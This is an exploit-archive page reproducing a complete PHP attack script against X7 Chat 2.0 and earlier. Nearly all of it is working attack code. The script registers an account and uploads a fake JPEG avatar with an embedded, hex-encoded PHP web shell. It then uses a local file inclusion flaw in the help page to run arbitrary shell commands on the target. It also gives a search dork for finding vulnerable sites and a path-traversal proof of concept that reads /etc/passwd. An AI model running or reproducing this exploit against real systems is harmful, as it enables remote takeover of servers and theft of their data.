Advertisement






X7 Chat <=2.0 remote commands execution

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2006-05-12
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C/CR:H/IR:H/AR:H/MAC:H/MPR:H/ME:H/MV:H/MC:H/MI:H/MA:H 0.39012 0.92516

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006050026

Below is a copy:

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "X7 Chat <=2.0 "help_file" arbitrary local inclusionrn";

echo "by rgod rgod (at) autistici (dot) org [email concealed]rn";

echo "site: http://retrogod.altervista.orgrn";

echo "-> works regardless of magic_quotes_gpc settingsrn";

echo "   if avatar uploads are enabled (default)rn";

echo "dork: intitle:"X7 Chat Help Center" | "Powered By X7 Chat"rnrn";

if ($argc<4) {

echo "Usage: php ".$argv[0]." host path cmd OPTIONSrn";

echo "host:      target server (ip/hostname)rn";

echo "path:      path to X7rn";

echo "cmd:       a shell commandrn";

echo "Options:rn";

echo "   -p[port]:    specify a port other than 80rn";

echo "   -P[ip:port]: specify a proxyrn";

echo "Examples:rn";

echo "php ".$argv[0]." localhost /X7/ cat ./../config.phprn";

echo "php ".$argv[0]." localhost /X7/ ls -la -p81rn";

echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80rn";

die;

}

/*

software site: http://www.x7chat.com/

description: "X7 Chat is free, open source, software written in PHP"

vulnerable code in help/index.php at lines 32-37:

...

if(!isset($_GET['help_file']) || !@is_file("./{$_GET['help_file']}")){

$_GET['help_file'] = "main";

}

// Load the help definitions

include("./{$_GET['help_file']}");

...

so, you can view/include all files on target system, poc:

http://[target]/[path]/help/index.php?help_file=../../../../../../etc/pa
sswd

this tool upload an avatar with php code as EXIF metadata content, then:

http://[target]/[path]/help/index.php?help_file=../uploads/avatar_[usern
ame].jpeg&cmd=ls%20-la

*/

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.="  .";}

else

{$result.="  ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}

}

return $exa."rn".$result;

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "rn".$html;

}

function make_seed()

{

list($usec, $sec) = explode(' ', microtime());

return (float) $sec + ((float) $usec * 100000);

}

$host=$argv[1];

$path=$argv[2];

$cmd="";$port=80;$proxy="";

for ($i=3; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if (($temp<>"-p") and ($temp<>"-P"))

{$cmd.=" ".$argv[$i];}

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

}

$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

srand(make_seed());

$v = rand(1,99);

echo "step 1 -> register...rn";

$data="username=suntzu".$v;

$data.="&pass1=suntzu";

$data.="&pass2=suntzu";

$data.="&email=suntzu".$v."@hotmail.com";

$packet ="POST ".$p."index.php?act=register&step=1 HTTP/1.0rn";

$packet.="Content-Type: application/x-www-form-urlencodedrn";

$packet.="Host: ".$host."rn";

$packet.="Content-Length: ".strlen($data)."rn";

$packet.="Connection: Closernrn";

$packet.=$data;

#debug

#echo quick_dump($packet);

sendpacketii($packet);

echo "step 2 -> login...rn";

$data="dologin=dologin";

$data.="&username=suntzu".$v;

$data.="&password=suntzu";

$packet="POST ".$p."index.php HTTP/1.0rn";

$packet.="Content-Type: application/x-www-form-urlencodedrn";

$packet.="Host: ".$host."rn";

$packet.="Content-Length: ".strlen($data)."rn";

$packet.="Connection: Closernrn";

$packet.=$data;

#debug

#echo quick_dump($packet);

sendpacketii($packet);

$temp=explode("Set-Cookie: ",$html);

$temp2=explode(" ",$temp[1]);$cookie=$temp2[0];

$temp2=explode(" ",$temp[2]);$cookie.=" ".$temp2[0];

if ($cookie=="") {die("Failed to login...rn");}

echo "Cookie -> ".$cookie."rn";

echo "step 3 -> upload an avatar...rn";

$shell=

chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x00).chr(0xcf).chr(0x3c).ch
r(0x3f).

chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x69).chr(0x66).ch
r(0x20).

chr(0x28).chr(0x67).chr(0x65).chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).ch
r(0x67).

chr(0x69).chr(0x63).chr(0x5f).chr(0x71).chr(0x75).chr(0x6f).chr(0x74).ch
r(0x65).

chr(0x73).chr(0x5f).chr(0x67).chr(0x70).chr(0x63).chr(0x28).chr(0x29).ch
r(0x29).

chr(0x7b).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).ch
r(0x49).

chr(0x45).chr(0x5b).chr(0x27).chr(0x63).chr(0x6d).chr(0x64).chr(0x27).ch
r(0x5d).

chr(0x3d).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).chr(0x73).ch
r(0x6c).

chr(0x61).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(0x28).chr(0x24).ch
r(0x5f).

chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).ch
r(0x27).

chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).chr(0x29).chr(0x3b).ch
r(0x7d).

chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).ch
r(0x5f).

chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).chr(0x69).ch
r(0x6e).

chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).ch
r(0x69).

chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).chr(0x28).ch
r(0x22).

chr(0x6d).chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).ch
r(0x63).

chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).ch
r(0x69).

chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).ch
r(0x0d).

chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).ch
r(0x35).

chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).chr(0x3b).chr(0x0d).ch
r(0x0a).

chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).ch
r(0x75).

chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).ch
r(0x49).

chr(0x45).chr(0x5b).chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).ch
r(0x5d).

chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x65).chr(0x63).chr(0x68).ch
r(0x6f).

chr(0x20).chr(0x22).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).ch
r(0x22).

chr(0x3b).chr(0x0d).chr(0x0a).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).ch
r(0x0d).

chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).ch
r(0x4a).

chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).ch
r(0x00).

chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).ch
r(0x00).

chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0xff).

chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).ch
r(0x01).

chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).ch
r(0x03).

chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).ch
r(0x01).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x09).

chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).ch
r(0xc4).

chr(0x00).chr(0x14).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x06).chr(0xff).chr(0xc4).chr(0x00).ch
r(0x14).

chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).ch
r(0x01).

chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).ch
r(0x00).

chr(0x3f).chr(0xc1).chr(0xc7).chr(0xdf).chr(0xff).chr(0xd9).chr(0x00).ch
r(0x00);

$data='-----------------------------7d63ba6e09fc

Content-Disposition: form-data; name="MAX_FILE_SIZE"

5242880

-----------------------------7d63ba6e09fc

Content-Disposition: form-data; name="avatar"; filename="whatever.jpg"

Content-Type: image/jpeg

'.$shell.'

-----------------------------7d63ba6e09fc--

';

echo "step 4 -> launch commands...rn";

$packet="POST ".$p."index.php?act=usercp&cp_page=upload&uploaded=1 HTTP/1.0rn";

$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63ba6e09fcrn";

$packet.="Host: ".$host."rn";

$packet.="Content-Length: ".strlen($data)."rn";

$packet.="Cookie: ".$cookie."rn";

$packet.="Connection: Closernrn";

$packet.=$data;

#debug

#echo quick_dump($packet);

sendpacketii($packet);

$path_to_shell=urlencode("../uploads/avatar_suntzu".$v.".jpeg");

$packet ="GET ".$p."help/index.php?help_file=".$path_to_shell." HTTP/1.0rn";

$packet.="User-Agent: Googlebot/2.1rn";

$packet.="Host: ".$host."rn";

$packet.="Cookie: cmd=".$cmd."rn";

$packet.="Connection: Closernrn";

#debug

#echo quick_dump($packet);

sendpacketii($packet);

if (strstr($html,"56789"))

{

echo "Exploit succeeded...rnrn";

$temp=explode("56789",$html);

echo $temp[1];

die;

}

//if you are here...

echo "Exploit failed...";

?>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum